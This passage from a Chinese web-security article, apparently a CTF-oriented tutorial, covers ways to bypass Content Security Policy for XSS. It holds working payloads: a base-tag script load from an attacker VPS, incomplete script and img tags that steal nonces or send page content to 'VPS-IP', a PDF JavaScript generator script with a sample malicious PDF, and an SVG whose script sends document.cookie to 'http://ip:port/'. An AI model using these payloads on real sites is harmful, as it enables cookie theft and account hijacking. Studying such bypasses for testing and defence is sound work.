http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-test'"> <base href="//VPS-IP/"> <script nonce='test' src="2.js"></script></code></pre> 我们在自己服务器上创建一个2.js的脚本，可以将恶意脚本写入2.js中，从而当浏览器解析上述payload时，会访问我们的服务器上的创建的2.js恶意脚本，从而实现XSS 如果页面的script-src不是采用的nonce而是self或者域名ip，则不能使用此方法，因为VPS-IP不在CSP白名单内。 <h5>10.不完整script标签绕过nonce</h5> 适用于可控点在合法script标签上方,且其中没有其他标签，XSS页面的CSP script-src只采用了nonce方式 <pre><code><?php header("X-XSS-Protection:0");?> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-xxxxx'"> <?php echo $_GET['xss']?> <script nonce='xxxxx'> //do some thing </script></code></pre> 这里给出的环境符合我们利用不完整script标签绕过nonce，所以可以操作一下 <pre><code>?xss=<script src=data:text/plain,alert(1)</code></pre> 成功弹窗 <img src="https://xzfile.aliyuncs.com/media/upload/picture/20230330140126-4e7218a8-cec0-1.png" alt="image.png"> 这里是利用了浏览器的一个特性： 当浏览器碰到一个左尖括号时，会变成标签开始状态，然后会一直持续到碰到右尖括号为止，在其中的数据都会被当成标签名或者属性 所以我们利用GET的方式传参进去的'<script src=data:text/plain,alert(1)',根据优先级是标签开始的位置，而第五行的<script会被当做我们输入的<script>标签的属性名，值为空，而原本的<code>nonce</code>属性的值成了我们构造的<script>的属性的值，这里可以理解为我们窃取了<code>nonce</code>值，从而绕过CSP。 这个payload在火狐浏览器上可以执行且不报错的，但是经过测试在chrome浏览器中，进行解析时会报错 这里可以用到标签的一个技巧，当一个标签存在两个同名属性时，第二个属性的属性名及其属性值都会被浏览器忽略 <pre><code>?xss=123<script src="data:text/plain,alert(1)" a=123 a=</code></pre> 先新建一个a属性，然后再新建第二个a属性，这样我们就将题目中原本的<script赋给了第二个a属性，浏览器在解析的时候直接忽略了第二个属性及其后面的值，这样exp就能成功在chrome浏览器上执行。 <h5>11.借助外域资源绕过</h5> 适用于可以进行外域资源引用，且注入点在CSP策略下方 在做题的时候，有时候会遇到下列所给的CSP策略 <pre><code><meta http-equiv="Content-Security-Policy" content="default-src 'self';script-src 'self'; img-src *;"></code></pre> 这里设置的CSP策略指令img-src允许加载外域图片资源，就是意味着该网页允许从任何来源加载图像。 所以说，我们是不是可以利用<img>标签伪造一下我们的XSS恶意代码，从而注入到该网页呢？ <pre><code>?key=<img src="VPS-IP?a=</code></pre> 这里我们利用一个不完整的<img>标签将数据外带到我们的VPS上，这里就要涉及一个语法了 当我们的标签未闭合时，html解析器会一直去寻找下一个引号，从而闭合src属性，所以说在下一个引号前的标签都不会被解析，从而绕过CSP 利用此特性，我们可以将CSP策略下方的内容给外带到我们的VPS上，从而实现窃取信息。 <h5>12.利用PDF XSS绕过</h5> 适用于没有设置object-src，或者object-src没有设置为'none'，pdf用的是chrome的默认解析器。 PDF XSS是存储型XSS的一种攻击方式，其实原理也很简单，就是攻击者将恶意代码写入PDF文件中，将此图片利用文件上传或者创建在自己的VPS上，受害者访问从而进行XSS攻击。 PDF XSS不能获取页面cookie，但是可以弹窗，url跳转等。 这种类型的XSS，我自己是没有见过的，借用一下大师傅的源码。 源码示例 <pre><code><meta http-equiv="Content-Security-Policy" content="script-src 'self'"> <?php echo $_GET[1]?></code></pre> 在CSP标准里面，有一个属性是object-src，它限制的是<embed> <object> <applet>标签的src属性，也就是插件的src属性 我们可以通过插件来执行Javascript代码，插件的js代码并不受script-src的约束 <pre><code><embed width="100%" height="100%" src="//VPS-IP/1.pdf"></embed></code></pre> 之后我们在自己的VPS上创建一个带有恶意脚本的1.pdf文件即可。 这里附上一个用来生成含有JavaScript的PDF文件的国外师傅的开源python脚本 <div class="highlight"><pre>#!/usr/bin/python # V0.1 2008/05/23 # make-pdf-javascript, use it to create a PDF document with embedded JavaScript that will execute automatically when the document is opened # requires module mPDF.py # Source code put in public domain by Didier Stevens, no Copyright # https://DidierStevens.com # Use at your own risk # # History: # # 2008/05/29: continue # 2008/11/09: cleanup for release import mPDF import optparse def Main(): """make-pdf-javascript, use it to create a PDF document with embedded JavaScript that will execute automatically when the document is opened """ parser = optparse.OptionParser(usage='usage: %prog [options] pdf-file', version='%prog 0.1') parser.add_option('-j', '--javascript', help='javascript to embed (default embedded JavaScript is app.alert messagebox)') parser.add_option('-f', '--javascriptfile', help='javascript file to embed (default embedded JavaScript is app.alert messagebox)') (options, args) = parser.parse_args() if len(args) != 1: parser.print_help() print '' print ' make-pdf-javascript, use it to create a PDF document with embedded JavaScript that will execute automatically when the document is opened' print ' Source code put in the public domain by Didier Stevens, no Copyright' print ' Use at your own risk' print ' https://DidierStevens.com' else: oPDF = mPDF.cPDF(args[0]) oPDF.header() oPDF.indirectobject(1, 0, '<<\n /Type /Catalog\n /Outlines 2 0 R\n /Pages 3 0 R\n /OpenAction 7 0 R\n>>') oPDF.indirectobject(2, 0, '<<\n /Type /Outlines\n /Count 0\n>>') oPDF.indirectobject(3, 0, '<<\n /Type /Pages\n /Kids [4 0 R]\n /Count 1\n>>') oPDF.indirectobject(4, 0, '<<\n /Type /Page\n /Parent 3 0 R\n /MediaBox [0 0 612 792]\n /Contents 5 0 R\n /Resources <<\n /ProcSet [/PDF /Text]\n /Font << /F1 6 0 R >>\n >>\n>>') oPDF.stream(5, 0, 'BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET') oPDF.indirectobject(6, 0, '<<\n /Type /Font\n /Subtype /Type1\n /Name /F1\n /BaseFont /Helvetica\n /Encoding /MacRomanEncoding\n>>') if options.javascript == None and options.javascriptfile == None: javascript = """app.alert({cMsg: 'Hello from PDF JavaScript', cTitle: 'Testing PDF JavaScript', nIcon: 3});""" elif options.javascript != None: javascript = options.javascript else: try: fileJavasScript = open(options.javascriptfile, 'rb') except: print "error opening file %s" % options.javascriptfile return try: javascript = fileJavasScript.read() except: print "error reading file %s" % options.javascriptfile return finally: fileJavasScript.close() oPDF.indirectobject(7, 0, '<<\n /Type /Action\n /S /JavaScript\n /JS (%s)\n>>' % javascript) oPDF.xrefAndTrailer('1 0 R') if __name__ == '__main__': Main() </pre></div> 附上用法和命令 <pre><code>Usage: make-pdf-javascript.py [options] pdf-file Options: --version show program's version number and exit -h, --help show this help message and exit -j JAVASCRIPT, --javascript=JAVASCRIPT javascript to embed (default embedded JavaScript is app.alert messagebox) -f JAVASCRIPTFILE, --javascriptfile=JAVASCRIPTFILE javascript file to embed (default embedded JavaScript is app.alert messagebox) make-pdf-javascript, use it to create a PDF document with embedded JavaScript that will execute automatically when the document is opened Source code put in the public domain by Didier Stevens, no Copyright Use at your own risk https://DidierStevens.com</code></pre> 我这里利用这个脚本生成了一个带有恶意脚本的PDF <pre><code>%PDF-1.4 %âãÏÓ 1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj 2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj 3 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Contents 4 0 R >> endobj 4 0 obj << /Length 53 >> stream BT /F1 12 Tf 1 0 0 rg 72 720 Td (PDF XSS Example) Tj ET <</S/JavaScript/JS(alert('1'))>> endstream endobj xref 0 5 0000000000 65535 f 0000000012 00000 n 0000000079 00000 n 0000000178 00000 n 0000000413 00000 n trailer << /Size 5 /Root 1 0 R >> startxref 532 %%EOF</code></pre> 在我本地测试一下，成功弹窗 <h5>13.利用SVG矢量图绕过</h5> 适用于可以上传SVG文件 SVG是可缩放矢量图形（Scalable Vector Graphics）的缩写，是一种基于XML语法的2D图形格式，用于描述矢量图形。与像素图形不同，矢量图形是由数学公式和几何图形描述的，因此可以无限放大而不失真。 其实原理跟PDF XSS原理一样的，上面介绍了，这里就不多赘述。 给出一个示例SVG文件： <div class="highlight"><pre><?xml version="1.0" encoding="UTF-8" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="100px" height="100px" viewBox="0 0 751 751" enable-background="new 0 0 751 751" xml:space="preserve"> <image id="image0" width="751" height="751" x="0" y="0" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAu8AAALvCAIAAABa4bwGAAAAIGNIUk0AAHomAACAhAAA+gAAAIDo" /> <script>document.location.href='http://ip:port/'+document.cookie</script> </svg> </pre></div> <h1>参考</h1> <a href="https://www.freebuf.com/articles/web/340080.html">xss 常用标签及绕过姿势总结 </a> <a href="https://xz.aliyun.com/t/5084#toc-3">我的CSP绕过思路及总结</a> </script>

文章来源: https://xz.aliyun.com/t/12370
如有侵权请联系:admin#unsafe.sh